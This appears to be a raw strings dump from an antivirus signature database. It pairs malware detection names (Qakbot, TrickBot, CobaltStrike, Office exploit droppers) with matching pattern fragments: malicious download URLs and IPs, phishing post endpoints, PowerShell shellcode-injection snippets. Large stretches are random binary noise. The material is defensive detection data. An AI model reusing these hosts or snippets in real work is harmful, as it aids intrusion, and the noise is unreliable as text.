;CLSID\\{00000319-0000-0000-C000-000000000046}\\AuxUserType\\2 6system\\currentcontrolset\\control\\safeboot\\network\\tdi ;SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\PlugPlay ;SYSTEM\\CurrentControlSet\\control\\safeboot\\network\\dnscache ;SYSTEM\\CurrentControlSet\\control\\safeboot\\network\\plugplay ;system\\currentcontrolset\\control\\safeboot\\network\\eventlog BSOFTWARE\\Classes\\Interface\\{0000000b-0000-0000-c000-000000000046} BSOFTWARE\\Classes\\Interface QF'!J 8!&Xg ~wqhm dZ' q o#zuC <M0V 8HsO? KRux= %q }u LCsug ;boqg ;OZwg (\\' / ;SK?g [t BY_.a +;Mlp iI}pp X2kTg W8Kyg H>XXg DG-mg !FakeSysdef!rfn !WinShow!rfn !Istbar!rfn Qf.2( !Slenfbot!rfn !Cinmus!rfn !Hiloti!rfn !Busky!rfn !C2Lop!rfn !Daonol!rfn !Karagany!rfn $yk{] !Harnig!rfn !Koobface!rfn !Fareit.AF PUA:Win32/Creprote.A PUA:PoorCertRep:Blocked PUA:PoorCertRep:Blocked:DlOnly 'PUA:PoorCertRep:Blocked:DlOnly Pr[L DhvG Ptm7* Ptm7* PuM*$ PuM*$ PyVL Pzmk (o:\td Fkk#)a; @ n8vmx 0#2$f b@W b >8^\tF 5cEUN 'HH7k ,|!$< .h1RNr 9.87D{ mF,q\" 0XFKH ^C'E#o +_).X )4Gz /r~?v SA]2r #YVId tFUsB Jt`N) l]GoS qeXai m@ C]` Cm>Sz UyKEC-) t8=(V 2K6xBP Ni}YR F|Z[&~ dS,yRXq e?b06 (v}aT O #XD u&4,]Q'o D`}][ js G6 lFXD\\ 4sB>hs S|5d{ P1NZQ Ari 9}.\\)9 \t/. *0 OM(x+f Ls/f\\!, s3*p) H= (!'3 ,!s_x Q\tqY Q FC B W6Du `dFSk^| Q /(c Q /(c :hE>I 5%[#P Mj*leh + & n@/dJiG Wjn-\t| LrRZ/ Z]<bn d|VyK umqi* Q\"Z<v Q\"Z<v u.!2v ^rfHe? |*F<z\"vb rbls4 Q&(C_ Q&(C_ q#b'G 7|xmK BIlv) Q)y]n Q)y]n f\\c7[/I Q-\\f Q. r \tF]%PW e]arfz- \tZ'eX29 vp'X0 9~XU, Vqz-g aJ/L({ ^Byh{ .m gC !EP1VO`Se jFMbR 5K|CQ so3# $:I2` O*Gu' FO$(a g!C` W $\\x-\ts ;,%TL 43, w*E VS0r! s_rC$ Uj,f[). ~RwP_ F*5B$ / r$3O4 Q f}x yX?T D-Qm0J? siJ 9 C$>7- 2x#| W Bt3 <Y [_8h] >brq\tg -jZ>LT Gg.,D ~Ezw[ #gofE ;<L6\ta{a\"k {MpU) yD*&\\ ,!:iv '6~wSU +hh!jg C|~9T 5^Z8_@ JX#I& StK>n 1?$Q& k3r`h >0?!H n#,\\6 Binterface\\{00020403-0000-0000-c000-000000000046}\\proxystubclsid32 N{00020425-0000-0000-C000-000000000046} Binterface\\{0002df05-0000-0000-c000-000000000046}\\proxystubclsid32 N{0002df05-0000-0000-c000-000000000046} Binterface\\{0002e000-0000-0000-c000-000000000046}\\proxystubclsid32 N{B8DA6310-E19B-11D0-933C-00A0C90DCAA9} Binterface\\{000C1090-0000-0000-C000-000000000046}\\proxystubclsid32 Binterface\\{b1efc382-9355-11d0-835c-00aa003ccabd}\\proxystubclsid32 BSOFTWARE\\Classes\\Interface\\{00000030-0000-0000-c000-000000000046} MSoftware\\classes\\clsid\\{000c103e-0000-0000-c000-000000000046}\\inprocserver32 Msoftware\\classes\\clsid\\{101193c0-0bfe-11d0-af91-00aa00b67a42}\\inprocserver32 Msoftware\\classes\\clsid\\{129d7e40-c10d-11d0-afb9-00aa00b67a42}\\inprocserver32 SSYSTEM\\CurrentControlSet\\Control\\Class\\{4d36e967-e325-11ce-bfc1-08002be10318}\\0001 ProviderName SSYSTEM\\CurrentControlSet\\Control\\Class\\{4d36e96a-e325-11ce-bfc1-08002be10318}\\0001 Ssystem\\currentcontrolset\\control\\class\\{4d36e967-e325-11ce-bfc1-08002be10318}\\0000 providername WSOFTWARE\\Classes\\CLSID\\{ef636391-f343-11d0-9477-00c04fd36226}\\VersionIndependentProgId $DBRSTPRX.AsServer Wsoftware\\classes\\clsid\\{13709620-c279-11ce-a49e-444553540000}\\versionindependentprogid $Shell.Application Ysystem\\currentcontrolset\\control\\safeboot\\minimal\\{4d36e977-e325-11ce-bfc1-08002be10318} PCMCIA Adapters Ysystem\\currentcontrolset\\control\\safeboot\\network\\{4d36e977-e325-11ce-bfc1-08002be10318} Ysystem\\currentcontrolset\\services\\sharedaccess\\parameters\\firewallpolicy\\standardprofile enablefirewall FCLSID\\{00C429C0-0BA9-11d2-A484-00C04F8EFB69}\\VersionIndependentProgID HDXImageTransform.Microsoft.CrBlinds Gclsid\\{623e2882-fc0e-11d1-9a77-0000f8756a10}\\\\VersionIndependentProgID FDXImageTranform.Microsoft.Gradient DesktopItemNavigationFailure>res://ieframe.dll/navcancl.htm localserviceRAlerterWebClientLmHostsRemoteRegistryupn >SOFTWARE\\Classes\\clsid\\{d54eee56-aaab-11d0-9e1d-00a0c922e6ec} XMicrosoft InfoTech IStorage for Win32 Files Dsoftware\\classes\\typelib\\{333c7bc1-460f-11d0-bc04-0080c7055a83}\\1.1 LTabular Data Control 1.1 Type Library Hsoftware\\microsoft\\mmc\\nodetypes\\{0442836e-c770-11d1-87f4-00c04fc2c17b} DComponent Services Component Node MSOFTWARE\\Classes\\CLSID\\{9d148290-b9c8-11d0-a4cc-0000f80149f6}\\InprocServer32 :C:\\Windows\\system32\\itss.dll MSOFTWARE\\Classes\\CLSID\\{9d148291-b9c8-11d0-a4cc-0000f80149f6}\\InprocServer32 5system\\currentcontrolset\\control\\network\\connections classmanagersR{B4C8DF59-D16F-4042-80B7-3557A254B7C5}{B Bsoftware\\microsoft\\windows\\currentversion\\app paths\\wireshark.exe RC:\\Program Files\\Wireshark\\wireshark.exe FSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\867f415d DllName<C:\\Windows\\System32\\MyDll.Dll Lsoftware\\classes\\typelib\\{cd000000-8b95-11d1-82db-00c04fb1625d}\\1.0\\0\\win32 >C:\\WINDOWS\\system32\\cdosys.dll MSOFTWARE\\Classes\\clsid\\{09474572-b2fb-11d1-a1a1-0000f875b132}\\inprocserver32 <%SystemRoot%\\system32\\cic.dll Ysystem\\currentcontrolset\\control\\safeboot\\minimal\\{4d36e980-e325-11ce-bfc1-08002be10318} $Floppy disk drive Ysystem\\currentcontrolset\\control\\safeboot\\network\\{4d36e980-e325-11ce-bfc1-08002be10318} jsoftware\\classes\\media type\\{e436eb83-524f-11ce-9f53-0020af0ba770}\\{33facfe0-a9be-11d0-a520-00a0d10129c0} jsoftware\\classes\\media type\\{e436eb83-524f-11ce-9f53-0020af0ba770}\\{6b6d0801-9ada-11d0-a520-00a0d10129c0} kCLSID\\{06290BD8-48AA-11D2-8432-006008C3FBFC}\\Implemented Categories\\{7DD95801-9882-11CF-9FA9-00AA006C42C4} kCLSID\\{0E59F1D5-1FBE-11D0-8FF2-00A0D10038BC}\\Implemented Categories\\{0DE86A52-2BAA-11CF-A229-00AA003D7352} kCLSID\\{16B280C8-EE70-11D1-9066-00C04FD9189D}\\Implemented Categories\\{ACAC94FC-E5CF-11D1-9066-00C04FD9189D} kCLSID\\{16B280C8-EE70-11D1-9066-00C04FD9189D}\\Implemented Categories\\{C501EDBE-9E70-11D1-9053-00C04FD9189D} kCLSID\\{1C82EAD9-508E-11D1-8DCF-00C04FB951F9}\\Implemented Categories\\{40FC6ED4-2438-11CF-A3DB-080036F12502} kCLSID\\{1C82EAD9-508E-11D1-8DCF-00C04FB951F9}\\Implemented Categories\\{7DD95802-9882-11CF-9FA9-00AA006C42C4} kCLSID\\{333c7bc4-460f-11d0-bc04-0080c7055a83}\\Implemented Categories\\{0de86a57-2baa-11cf-a229-00aa003d7352} kclsid\\{00c429c0-0ba9-11d2-a484-00c04f8efb69}\\implemented categories\\{c501edbe-9e70-11d1-9053-00c04fd9189d} kclsid\\{06290bdb-48aa-11d2-8432-006008c3fbfc}\\implemented categories\\{7dd95801-9882-11cf-9fa9-00aa006c42c4} kclsid\\{0c7ff16c-38e3-11d0-97ab-00c04fc2ad98}\\implemented categories\\{d267e19a-0b97-11d2-bb1c-00c04fc9b532} kclsid\\{10072cec-8cc1-11d1-986e-00a0c955b42e}\\implemented categories\\{7dd95801-9882-11cf-9fa9-00aa006c42c4} kclsid\\{2bc0ef29-e6ba-11d1-81dd-0000f87557db}\\implemented categories\\{c501edbe-9e70-11d1-9053-00c04fd9189d} kclsid\\{30d02401-6a81-11d0-8274-00c04fd5ae38}\\implemented categories\\{00021493-0000-0000-c000-000000000046} kclsid\\{333c7bc4-460f-11d0-bc04-0080c7055a83}\\implemented categories\\{40fc6ed4-2438-11cf-a3db-080036f12502} kclsid\\{333c7bc4-460f-11d0-bc04-0080c7055a83}\\implemented categories\\{7dd95801-9882-11cf-9fa9-00aa006c42c4} kclsid\\{421516c1-3cf8-11d2-952a-00c04fa34f05}\\implemented categories\\{c501edbe-9e70-11d1-9053-00c04fd9189d} kclsid\\{f515306e-0156-11d2-81ea-0000f87557db}\\implemented categories\\{c501edbe-9e70-11d1-9053-00c04fd9189d} Dsoftware\\classes\\typelib\\{28dcd85b-aca4-11d0-a028-00aa00b605a4}\\1.0 PTAPI3 Terminal Manager 1.0 Type Library Dsoftware\\classes\\typelib\\{50a7e9b0-70ef-11d1-b75a-00a0c90564fe}\\1.0 PMicrosoft Shell Controls And Automation Lsoftware\\classes\\typelib\\{6bc09690-0ce6-11d1-baae-00c04fc2e20d}\\1.0\\0\\win32 @C:\\WINDOWS\\system32\\iassvcs.dll Lsoftware\\classes\\typelib\\{bacedf3e-74ab-11d0-b162-00aa00ba3258}\\1.0\\0\\win32 Msoftware\\classes\\clsid\\{06290bd0-48aa-11d2-8432-006008c3fbfc}\\inprocserver32 Msoftware\\classes\\clsid\\{1643e180-90f5-11ce-97d5-00aa0055595a}\\inprocserver32 Msoftware\\classes\\clsid\\{6bc096da-0ce6-11d1-baae-00c04fc2e20d}\\inprocserver32 >C:\\WINDOWS\\system32\\iasrad.dll Msoftware\\classes\\clsid\\{6bc098a4-0ce6-11d1-baae-00c04fc2e20d}\\inprocserver32 Msoftware\\classes\\clsid\\{6e449686-c509-11cf-aafa-00aa00b6015c}\\inprocserver32 >C:\\Windows\\System32\\inseng.dll 9CLSID\\{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}\\DefaultIcon hC:\\Program Files\\Internet Explorer\\iexplore.exe,-19 3system\\currentcontrolset\\control\\securityproviders securityprovidersRmsapsspc.dll, schannel.dll, digest.dll, Dsoftware\\classes\\typelib\\{2206ceb0-19c1-11d1-89e0-00c04fd7a829}\\1.0 RMicrosoft OLE DB Service Component 1.0 T Dsoftware\\classes\\typelib\\{bd96c556-65a3-11d0-983a-00c04fc29e30}\\1.5 RMicrosoft Remote Data Services 2.7 Libra FSOFTWARE\\Classes\\CLSID\\{039EA4C0-E696-11d0-878A-00A0C91EC756}\\TypeLib N{2358C810-62BA-11d1-B3DB-00600832C573} Lsoftware\\classes\\typelib\\{cfadac75-e12c-11d1-b34c-00c04f990d54}\\1.0\\0\\win32 BC:\\WINDOWS\\system32\\catsrvut.dll MSOFTWARE\\Classes\\CLSID\\{00021401-0000-0000-C000-000000000046}\\InProcServer32 @C:\\Windows\\system32\\shell32.dll MSOFTWARE\\Classes\\CLSID\\{063B79F5-7539-11D2-9773-00A0C9B4D50C}\\InprocServer32 @c:\\WINDOWS\\system32\\CLBCatQ.dll Msoftware\\classes\\clsid\\{12518493-00b2-11d2-9fa5-9e3420524153}\\inprocserver32 Msoftware\\classes\\clsid\\{163fdc20-2abc-11d0-88f0-00a024ab2dbb}\\inprocserver32 @c:\\windows /_./ Ub5U[K@ *r(@ww /cQr /d/2W /d/2W l?L34 /hE J+>h /hE J+>h /i!| @0p>z /jb@ EE#2: /lS7 =6HQ5/ /q%x /s/G X)}YP /vV$| /vV$| :( |d/i^ a /x N /zBC K!VCc 1)x+w ` PK #8hj) ?Pb\tH s _qI \tF,<~f ;(r9i w+ly}hl mfK( 2RQ)D %z0sQ f}e>b '/&), (71KU Hw5[Cfg VoB !| J2HpQq vH\\P\\{C8 \"c_xV8 dA\\?U Fsw6i WE\tZ7 )^,N^ $(&k1^ tEP^ kQjx-K'G qw?yF-e $jmiW @5DB&S er,\"[ r2WUYy J:F5U^L ,[C[w fU\"b' (]NR: h(]NR: @G#k1 cISyk T ~T; wSB_3 ht&[w uj7zy 0\\uCU mI IZ kw?yH 4]MRR \"P8\tv &LOIy`y a\tjlS/ j5rf- '6(;= ,84Ih Dd>Zxz$T; JW=,\" mXBUDH Z?xyA CvXk8 CvXk8b KFN}4 1upuR+S ifdQBh G5;8K OoNj_ Oo+-, L\"hS< M/05 L\"h,>V #|;='8c\\ #|;='8 e-Ntc\\ L\"hc\\ Oo;='8c\\ ;='8e-Nte-Nt N{;='8 ;='82 r;='8 ^;='8 );='8 Y;='82 ua4?! ?]wO= Oog2m 4yDc\\ ;='8K e-Nte-Nt V<J?O Qf,; R%VMAa ;='8% H;='8 oi;='8 TRW;='8 ;='8B ;='8VMAa PR9VMAa M;='8 ;='8H ;='8;='8 ;='8 aXVMAa ;='8? ;='8L 7UsQ] ;='8Q] ;='8;='8;='8 Q5;='8 ;='8t ;='8;='8Q] VMAa;='8 ;='8< oit:O97M/CVE-2017-11882.APV2!MTB \"\\objw +!#SCPT:Exploit:O97M/CVE-2017-11882.GGK2!MTB )X+!#SCPT:Exploit:O97M/CVE-2017-11882.GGK2!MTB jjjkkjjmmmmmmmmmmmmmmmmmmmmmmmmm \"jjjkkjjmmmmmmmmmmmmmmmmmmmmmmmmm +!#SCPT:HackTool:PowerShell/InvokeShellcode1 )X+!#SCPT:HackTool:PowerShell/InvokeShellcode1 inject-remoteshellcode$processid \"inject-remoteshellcode$processid +!#SCPT:TrojanDownloader:O97M/EncDoc.SMA!MTB )X+!#SCPT:TrojanDownloader:O97M/EncDoc.SMA!MTB htp:/windomas.cyuelc\\idfqteoymqw \"htp:/windomas.cyuelc\\idfqteoymqw +!#SCPT:TrojanDownloader:O97M/Qakbot.PC5!MTB )X+!#SCPT:TrojanDownloader:O97M/Qakbot.PC5!MTB \\appdata\\roaming\\gertik.jjssddff \"\\appdata\\roaming\\gertik.jjssddff +!#SCPT:TrojanDownloader:VBS/Obfuse.ZW10!MTB )X+!#SCPT:TrojanDownloader:VBS/Obfuse.ZW10!MTB =1'dountil \"=1'dountil +1'loop +!#SCPT:TrojanDropper:JS/Zlader.G!FuncScript )X+!#SCPT:TrojanDropper:JS/Zlader.G!FuncScript {return \"{return }wscript[b[ +!#SCRIPT:BrowserModifier:Win32/Neobar.A!url )X+!#SCRIPT:BrowserModifier:Win32/Neobar.A!url http://altavista.com/favicon.ico \"http://altavista.com/favicon.ico +!#SCRIPT:PowerShell/Get-NetDomainController )X+!#SCRIPT:PowerShell/Get-NetDomainController functionget-netdomaincontroller{ \"functionget-netdomaincontroller{ +!#SCRIPT:PowerShell/Invoke-ThreadedFunction )X+!#SCRIPT:PowerShell/Invoke-ThreadedFunction functioninvoke-threadedfunction{ \"functioninvoke-threadedfunction{ ,!#SCPT:Exploit:O97M/CVE-2017-11882.AZKR3!MTB )X,!#SCPT:Exploit:O97M/CVE-2017-11882.AZKR3!MTB {\\mborderboxpr !{\\mborderboxpr \\bin00000\\ ,!#SCPT:TrojanDownloader:JS/TrickBot.A1!jamsi )X,!#SCPT:TrojanDownloader:JS/TrickBot.A1!jamsi https://185.180.199.102/ !https://185.180.199.102/ ,!#SCPT:TrojanDownloader:O97M/Donoff.MOR3!MTB )X,!#SCPT:TrojanDownloader:O97M/Donoff.MOR3!MTB iepfusn.dll) !iepfusn.dll) .com/getfile.php ,!#SCPT:TrojanDownloader:O97M/Obfuse.WAA8!MTB )X,!#SCPT:TrojanDownloader:O97M/Obfuse.WAA8!MTB =\"str\"><f>\"bb\"</f><v>bb</v></c> !=\"str\"><f>\"bb\"</f><v>bb</v></c> ,!#SCRIPT:SoftwareBundler:Win32/Fourthrem.A-2 )X,!#SCRIPT:SoftwareBundler:Win32/Fourthrem.A-2 firstreq.me/ !firstreq.me/ -!#SCPT:PowerShell/ExecutionPolicyUnrestricted )X-!#SCPT:PowerShell/ExecutionPolicyUnrestricted powershell unrestricted -!#SCPT:TrojanDownloader:HTML/DocDownldr.A!sl6 )X-!#SCPT:TrojanDownloader:HTML/DocDownldr.A!sl6 settimeout(\"location=\"https:// settimeout(\"location=\"https:// -!#SCPT:TrojanDownloader:O97M/EncDoc.ZE!MTB!E5 )X-!#SCPT:TrojanDownloader:O97M/EncDoc.ZE!MTB!E5 c:\\qwsdhvr\\tclgkas\\spjcyvr.exe c:\\qwsdhvr\\tclgkas\\spjcyvr.exe -!#SCPT:TrojanDownloader:O97M/Encdoc.VICY4!MTB )X-!#SCPT:TrojanDownloader:O97M/Encdoc.VICY4!MTB <t>nload</t></si><si><t>to</t> <t>nload</t></si><si><t>to</t> -!#SCPT:TrojanDownloader:PowerShell/Nibnwod.A3 )X-!#SCPT:TrojanDownloader:PowerShell/Nibnwod.A3 %comspec%/cstart%temp%\\ %comspec%/cstart%temp%\\ .!#SCPT:TrojanDownloader:JS/Nemucod.WeirdIfLess )X.!#SCPT:TrojanDownloader:JS/Nemucod.WeirdIfLess 0-9){function .!#SCPT:TrojanDownloader:JS/Nemucod.WeirdReturn )X.!#SCPT:TrojanDownloader:JS/Nemucod.WeirdReturn 0-9.;return /!#ALF:TrojanDownloader:Powershell/BeatNik.B!dha )X/!#ALF:TrojanDownloader:Powershell/BeatNik.B!dha updatepool.online/update.php /!#SCPT:Trojan:JS/WmiScriptingEngineParams.B!ams )X/!#SCPT:Trojan:JS/WmiScriptingEngineParams.B!ams setpropvalue.scriptfilename( /!#SCPT:TrojanDownloader:O97M/EncDoc.FOY!MTB!OY3 )X/!#SCPT:TrojanDownloader:O97M/EncDoc.FOY!MTB!OY3 <vt:lpstr>foglio3</vt:lpstr> /!#SCPT:TrojanDownloader:O97M/EncDoc.FOY!MTB!OY6 )X/!#SCPT:TrojanDownloader:O97M/EncDoc.FOY!MTB!OY6 <shareddoc>false</shareddoc> /!#SCPT:TrojanDownloader:O97M/EncDoc.FYZ!MTB!ZY6 )X/!#SCPT:TrojanDownloader:O97M/EncDoc.FYZ!MTB!ZY6 /!#SCPT:TrojanDownloader:O97M/EncDoc.TAE!MTB!TE1 )X/!#SCPT:TrojanDownloader:O97M/EncDoc.TAE!MTB!TE1 http://rocesi.com/mncejd.exe /!#SCPT:TrojanDownloader:O97M/EncDoc.TIT!MTB!TJ3 )X/!#SCPT:TrojanDownloader:O97M/EncDoc.TIT!MTB!TJ3 <si><t>downloadfile</t></si> /!#SCPT:TrojanDownloader:O97M/EncDoc.VHT!MTB!VT1 )X/!#SCPT:TrojanDownloader:O97M/EncDoc.VHT!MTB!VT1 http://193.38.55.92/gfmppbpq /!#SCPT:TrojanDownloader:O97M/EncDoc.VHW!MTB!VW1 )X/!#SCPT:TrojanDownloader:O97M/EncDoc.VHW!MTB!VW1 http://194.5.249.101/api.php /!#SCPT:TrojanDownloader:O97M/EncDoc.VHY!MTB!VY1 )X/!#SCPT:TrojanDownloader:O97M/EncDoc.VHY!MTB!VY1 http://185.14.30.131/api.php /!#SCPT:TrojanDownloader:O97M/EncDoc.XCH!MTB!CH1 )X/!#SCPT:TrojanDownloader:O97M/EncDoc.XCH!MTB!CH1 https://chpingnow.xyz/21.psd /!#SCPT:TrojanDownloader:O97M/Zloader.CL!MTB!CL4 )X/!#SCPT:TrojanDownloader:O97M/Zloader.CL!MTB!CL4 0!#SCPT:PowerShell.InvokeObfuscation.CreateThread )X0!#SCPT:PowerShell.InvokeObfuscation.CreateThread kernel32.dllcreatethread),( 0!#SCPT:PowerShell.InvokeObfuscation.VirtualAlloc )X0!#SCPT:PowerShell.InvokeObfuscation.VirtualAlloc kernel32.dllvirtualalloc),( 0!#SCPT:Trojan:PowerShell/ReflectivePEInjection.A )X0!#SCPT:Trojan:PowerShell/ReflectivePEInjection.A 0!#SCPT:TrojanDownloader:O97M/EncDoc.IDOI!MTB!OI1 )X0!#SCPT:TrojanDownloader:O97M/EncDoc.IDOI!MTB!OI1 <v>44329,6550195602.dat</v> 0!#SCPT:TrojanDownloader:O97M/EncDoc.IDTC!MTB!TC1 )X0!#SCPT:TrojanDownloader:O97M/EncDoc.IDTC!MTB!TC1 <v>44340,6449053241.dat</v> 0!#SCPT:TrojanDownloader:O97M/EncDoc.IDTY!MTB!TY4 )X0!#SCPT:TrojanDownloader:O97M/EncDoc.IDTY!MTB!TY4 <f>run(sobr!h4)</f><v>0</v> 0!#SCPT:TrojanDownloader:O97M/EncDoc.IEAG!MTB!AG3 )X0!#SCPT:TrojanDownloader:O97M/EncDoc.IEAG!MTB!AG3 <f>goto('3fescvaer'!h4)</f> 0!#SCPT:TrojanDownloader:O97M/EncDoc.IEAJ!MTB!TJ3 )X0!#SCPT:TrojanDownloader:O97M/EncDoc.IEAJ!MTB!TJ3 <f>goto('4scdac'!g3)</f><v> 0!#SCPT:TrojanDownloader:O97M/EncDoc.IEAJ!MTB!TJ4 )X0!#SCPT:TrojanDownloader:O97M/EncDoc.IEAJ!MTB!TJ4 <f>d9&d10</f><v>exe</v> 0!#SCPT:TrojanDownloader:O97M/EncDoc.IEAM!MTB!TM4 )X0!#SCPT:TrojanDownloader:O97M/EncDoc.IEAM!MTB!TM4 <si><t>32-s\"&\".\"&\". 0!#SCPT:TrojanDownloader:O97M/EncDoc.IEAO!MTB!AO3 )X0!#SCPT:TrojanDownloader:O97M/EncDoc.IEAO!MTB!AO3 0!#SCPT:TrojanDownloader:O97M/EncDoc.IEAU!MTB!AU3 )X0!#SCPT:TrojanDownloader:O97M/EncDoc.IEAU!MTB!AU3 <f>goto('6vrtgarga'!f8)</f> 0!#SCPT:TrojanDownloader:O97M/EncDoc.IFAQ!MTB!AQ4 )X0!#SCPT:TrojanDownloader:O97M/EncDoc.IFAQ!MTB!AQ4 0!#SCPT:TrojanDownloader:O97M/EncDoc.IGAB!MTB!GB9 )X0!#SCPT:TrojanDownloader:O97M/EncDoc.IGAB!MTB!GB9 0!#SCPT:TrojanDownloader:O97M/EncDoc.IGAM!MTB!AM6 )X0!#SCPT:TrojanDownloader:O97M/EncDoc.IGAM!MTB!AM6 0!#SCPT:TrojanDownloader:O97M/EncDoc.IIAF!MTB!IF7 )X0!#SCPT:TrojanDownloader:O97M/EncDoc.IIAF!MTB!IF7 <f>\"regsvr32..\\kro.fis\"</f> 0!#SCPT:TrojanDownloader:O97M/EncDoc.RGEF!MTB!EF4 )X0!#SCPT:TrojanDownloader:O97M/EncDoc.RGEF!MTB!EF4 regsvr32.exe</t></si></sst> 0!#SCPT:TrojanDownloader:O97M/EncDoc.VIOK!MTB!OK4 )X0!#SCPT:TrojanDownloader:O97M/EncDoc.VIOK!MTB!OK4 <si><t>loadtofilea</t></si> 0!#SCPT:TrojanDownloader:O97M/TrickBot.HI!MTB!HI1 )X0!#SCPT:TrojanDownloader:O97M/TrickBot.HI!MTB!HI1 http://81.16.141.208/q37kkp 0!#SCPT:TrojanDownloader:O97M/Zloader.LOZ!MTB!OL6 )X0!#SCPT:TrojanDownloader:O97M/Zloader.LOZ!MTB!OL6 <si><t>jjccccj</t></si><si> 0!#SCPT:TrojanDownloader:O97M/Zloader.RYR!MTB!RY3 )X0!#SCPT:TrojanDownloader:O97M/Zloader.RYR!MTB!RY3 teagygk=sheet1!$b$61:$b$113 )X1!#ALF:TrojanDownloader:Script/CobaltStrike.VA!MSR serviceboostnumberone.com0 )X2!#SCPT:TrojanDownloader:Script/CobaltStrike.GA!MSR seventhserviceupdater.com 2!#SCRIPT:PowerShell/WinApiCreateToolhelp32Snapshot )X2!#SCRIPT:PowerShell/WinApiCreateToolhelp32Snapshot createtoolhelp32snapshot( 3!#SCPT:TrojanDownloader:PowerShell/FakePatch.A!hta1 )X3!#SCPT:TrojanDownloader:PowerShell/FakePatch.A!hta1 https://ahtaeereddit.org 3!#SCRIPT:SoftwareBundler:Win32/InstallMonetizer.A-4 )X3!#SCRIPT:SoftwareBundler:Win32/InstallMonetizer.A-4 blowfish.dllm0l3z5s0g1me 4!#SCPT:Trojan:JS/IframeRef!rogue_vector_001_screen02 )X4!#SCPT:Trojan:JS/IframeRef!rogue_vector_001_screen02 breakage.\";varaskerr=1; 4!#SCPT:TrojanDownloader:JS/Nemucod.EvalActiveXObject )X4!#SCPT:TrojanDownloader:JS/Nemucod.EvalActiveXObject =eval(\"activexobject\"); !#BLJammer.A regadd Bregadd \\software\\policies\\microsoft\\fve /vrecoverykeymessage !#SCPT:Robideo.A <f>\"c:\\users\\public\\\"&randbetween(1,9999)&\".txt\"</f> ><f>\"c:\\users\\public\\\"&randbetween(1,9999)&\".txt\"</f> !#SCPT:Robideo.B <f>\"c:\\users\\public\\\"&randbetween(1,9999)&\".vbs\"</f> ><f>\"c:\\users\\public\\\"&randbetween(1,9999)&\".vbs\"</f> !#SCPT:JS/Mult.Z1 /index.php'; =/index.php'; ';var f';var !#SCRIPT:HolAtt.E user_name=$get_user&os_name=$get_os&domain_name=$get_domain =user_name=$get_user&os_name=$get_os&domain_name=$get_domain !#SCRIPT:Ploty.H2 =add-type-member ==add-type-member -name\" \"-namespacewin32functions-p !#SCPT:CoreDriveAO core_buildrbraddr__n <core_buildrbraddr__n t_server__th_clienthichan_hchr/r&rr !#SCPT:Nemucod.CY4 )]<4){wscript[( <)]<4){wscript[( =wscript[ ()](( !#SCPT:PDF/Pididod action/s/uri/uri(https://piscineconstruct.ro/kjy/index.php <action/s/uri/uri(https://piscineconstruct.ro/kjy/index.php !#SCRIPT:JS/NewWASM =newwebassembly.instance(newwebassembly.module( ;=newwebassembly.instance(newwebassembly.module( !#Trojan:VBS/Vmnat3 ;savetofile(\"c:\\users\\ 0.exe\",\"2\"); !#ALF:SCPT:Vango!ini [http]documentroot= :[http]documentroot= :\\windows\\temp\\db\\rdp\\rdp\\webroot\\ !#JAM:AppdataFileExe ifilesystem :ifilesystem .fileexists(\"c:\\users\\ 0.exe\" !#SCPT:ReverseBase64 (strreverse(\" :(strreverse(\" 'abcdefghijklmnopqrstuvwxyz0123456789+/= !#SCRIPT:Naibi.A!lnk \\windows\\system32\\wscript.exe/e:vbscript.encodeiphon.mp3 :\\windows\\system32\\wscript.exe/e:vbscript.encodeiphon.mp3 !#SCRIPT:PS.DecBytes :[byte[]]$ !#SCPT:JS/Downloadify downloadify.defaultoptions={swf:\"media/downloadify.swf\" 9downloadify.defaultoptions={swf:\"media/downloadify.swf\" !#SLF:AsmblyLoadReg.B 9.run(\" `[reflection.assembly]::load((itempropertyhkcu: r.open(\"post\",\"https:\"+\"//\"+hostname+\"/ext/stat?\"+qs); 8r.open(\"post\",\"https:\"+\"//\"+hostname+\"/ext/stat?\"+qs); !#SCPT:Bondat.A5!jamsi \\programs\\startup\\start.lnk\");iwshshortcut.targetpath( 8\\programs\\startup\\start.lnk\");iwshshortcut.targetpath( !#SCPT:HafniumShell_10 dir/b/sc:\\windows\\x90 8dir/b/sc:\\windows\\x90 ^>c:\\windows\\x90 >>c:\\windows\\ 5.206.227.168/haoyun/office/next.php', 85.206.227.168/haoyun/office/next.php', url:'http:// _url:'http:// bidarpanda.com/autosau/payinpdf.php', 8bidarpanda.com/autosau/payinpdf.php', lacaiixa.com/style/style/sendjf.php', 8lacaiixa.com/style/style/sendjf.php', !#SCPT:AutoIt/Banload.2 7for$ 2=1tostringlen($ 5&=chr(bitxor(asc(stringmid($ !#SCPT:BAT/PWSLeben.HZ1 powershell\"iwr-uri 7powershell\"iwr-uri /firstga990.php-methodpost-body' !#SCPT:CVE-2019-1653-BD {*}weseemtohavefoundavalidencryptedconfig!writingto%s 7{*}weseemtohavefoundavalidencryptedconfig!writingto%s !#SCPT:HTMLShellcode.A2 definitialize(info={})super(update_info(info,'name'=> 7definitialize(info={})super(update_info(info,'name'=> !#SCPT:PDF/MLTriggers.1 0r>>/procset[/pdf/text/imageb/imagec/imagei]>>/annots 70r>>/procset[/pdf/text/imageb/imagec/imagei]>>/annots !#SCRIPT:BrowserArray.A foreachbrowserinbrowsers:browserdic.addlcase(browser) 7foreachbrowserinbrowsers:browserdic.addlcase(browser) !#Scpt:Cln:Ifenion3!MTB #kx7zuqibaaibaaibaaibaaibadaxma0gcwcgsaflawqcaquabca2 7#kx7zuqibaaibaaibaaibaaibadaxma0gcwcgsaflawqcaquabca2 !#Trojan:MacOS/Snake.A1 target_path}/installdp\"cp-f\"${script_dir}/installd.sh 7target_path}/installdp\"cp-f\"${script_dir}/installd.sh !#PUA:MacOS/Bundlore.Sd1 #!/usr/bin/envbashtmp_file=\"/tmp/e_$(date+%s)\"printf 6#!/usr/bin/envbashtmp_file=\"/tmp/e_$(date+%s)\"printf http://istanbulyilbasimekanlari.com/tracking-number- 6http://istanbulyilbasimekanlari.com/tracking-number- !#SCPT:Exploit:JS/Coolex try{document.body++;}catch( 6try{document.body++;}catch( if(navigator.plugins&& !#SCPT:JS/Obfuse.PY1!MTB c:\\users\\farids~1\\appdata\\local\\temp\\payments.doc.js 6c:\\users\\farids~1\\appdata\\local\\temp\\payments.doc.js !#SCPT:JS/Phish.RTJ2!MTB //window.location.replace(response['redirect_link']) 6//window.location.replace(response['redirect_link']) hdvhfhdhd.duckdns.org/pu/post.php', 6hdvhfhdhd.duckdns.org/pu/post.php', logz.live/frnd/shally/connect.php', 